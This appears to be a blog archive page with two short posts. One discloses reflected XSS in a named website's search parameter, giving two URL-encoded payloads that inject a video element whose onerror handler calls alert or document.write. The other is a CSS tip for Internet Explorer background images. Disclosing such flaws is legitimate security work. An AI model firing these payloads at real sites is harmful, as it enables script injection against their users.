Skip to main content

Posts

Showing posts from June, 2016

http://www.elite.com/ | XSS problems

Simple XSS  http://www.elite.com/?s=%3C%2Fh3%3E%3Cvideo%3E%3Csource+onerror%3D%22alert(%27XSS%27)%22%3E%3C%2Fsource%3E%3C%2Fvideo%3E%3Ch3%3E http://www.elite.com/?s=%3C%2Fh3%3E%3Cvideo%3E%3Csource+onerror%3D%22document.write%28%27XSS%27%29%22%3E%3C%2Fsource%3E%3C%2Fvideo%3E%3Ch3%3E

Fix background Image cover on Internet Explorer

Use the following CSS filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='.backgroundimage.jpg', sizingMethod='scale'); -ms-filter: "progid:DXImageTransform.Microsoft.AlphaImageLoader(src=' backgroundimage. jpg', sizingMethod='scale')"; ALERT : If you have random problems like dead links and similar use a fixed 100% (height and width) div container instead of html or body.